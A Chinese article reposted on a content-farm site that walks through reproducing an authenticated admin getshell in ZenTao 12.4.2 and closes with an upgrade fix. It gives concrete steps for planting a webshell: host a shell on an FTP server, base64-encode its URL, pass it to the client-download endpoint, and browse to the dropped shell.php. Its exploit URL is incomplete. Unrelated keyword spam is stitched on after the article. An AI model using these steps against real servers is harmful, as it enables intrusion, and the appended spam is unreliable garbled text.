千家信息网

禅道12.4.2后台管理员权限Getshell是怎样的

发表于:2024-11-11 作者:千家信息网编辑
千家信息网最后更新 2024年11月11日,本篇文章给大家分享的是有关禅道12.4.2后台管理员权限Getshell是怎样的,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。0x00简
千家信息网最后更新 2024年11月11日禅道12.4.2后台管理员权限Getshell是怎样的

本篇文章给大家分享的是有关禅道12.4.2后台管理员权限Getshell是怎样的,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

0x00简介

禅道是一款专业的国产开源研发项目管理软件,集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,完整覆盖了研发项目管理的核心流程。管理思想基于国际流行的敏捷项目管理方法--Scrum,在遵循其价值观的基础上,结合国内项目研发现状,整合了任务管理、需求管理、Bug管理、用例管理等多种功能,覆盖软件从计划到发布的整个生命周期。

0x01漏洞概述

禅道12.4.2版本存在任意文件下载漏洞,该漏洞是因为client类中download方法中过滤不严谨可以使用ftp达成下载文件的目的。且下载文件存储目录可解析php文件,造成getshell。

0x02影响版本

禅道≤ 12.4.2

0x03环境搭建

phpstudy2018 + 禅道12.4.2 禅道官方下载地址:

https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html

3.1. 下载完成后,放入phpstudy中安装即可

3.2. 检查扩展,要是存在未通过的扩展,在phpstudy中开启扩展即可。

3.3.设置数据库信息,这里设置成自己的数据库配置。

3.4.设置账号安装完成

3.4.利用环境搭建,开启ftp服务,以windows2008R2为例,在添加角色,添加ftp

3.5.然后在Internet信息服务下的网站添加ftp服务。

3.6.根据自己的情况配置,下一步即可

3.7.在ftp目录下放一个webshell然后浏览器查看ftp是否可以正常访问

0x04漏洞复现

1.首先把ftp加上shell的路径进行base64编码

加密前: ftp://192.168.3.200/shell.php

加密后: ZnRwJTNBLy8xOTIuMTY4LjMuMjAwL3NoZWxsLnBocA==

2.使用EXP,把加密后的base64放入exp中的<>里

http://127.0.0.1/zentaopms/www/index.php/client-download-1--1.html

3.使用以下链接路径测试是否shell已下载到服务器

http://192.168.3.200/zentaopms/www/data/client/1/shell.php

0x05修复方式

1、升级到禅道12.4.3及之后的版本

以上就是禅道12.4.2后台管理员权限Getshell是怎样的,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注行业资讯频道。

管理 项目 文件 漏洞 项目管理 服务 版本 加密 后台 权限 管理员 信息 数据 数据库 方法 更多 环境 目录 知识 篇文章 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 并发更新数据库死锁 香港服务器挖矿安全吗 滴滴网络安全审查流程 mysql数据库测试题 嗨皮咳嗽服务器国际服怎么进 马云背后的男人网络安全 科技互联网的未来 大学生网络安全怎么做 公安网络安全专项检查是什么意思 git拉取代码冲突以服务器为准 广州中智软件开发公司 最新数据库的新技术 如何查看服务器管理地址 2020年网络安全主题宣传语 如何在java显示数据库的时间 录像带出租管理系统设计数据库 骑士2连接服务器慢 打印服务器怎么管理 一个手机有多少个数据库 税务部门网络安全宣传周总结 网络安全专业主要学哪些课程 信息网络安全技术人员 证书 成都办公系统软件开发定制费用 保密知识网络安全培训 汽车车载网络技术题目 数据库根据多个值查询 飞花网络技术有限公司 杭州湖畔网络技术有限公司经理 怎么选电商服务器 网易云免费服务器
0